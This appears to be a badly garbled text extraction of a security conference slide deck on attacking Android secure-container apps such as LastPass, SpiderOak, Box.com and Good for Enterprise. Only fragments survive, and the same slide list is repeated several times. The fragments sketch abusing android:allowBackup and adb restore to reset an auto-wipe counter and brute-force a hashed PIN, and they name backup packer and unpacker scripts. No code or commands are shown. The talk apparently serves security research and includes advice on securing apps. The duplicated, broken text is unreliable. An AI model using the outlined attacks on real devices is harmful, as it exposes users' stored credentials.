][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

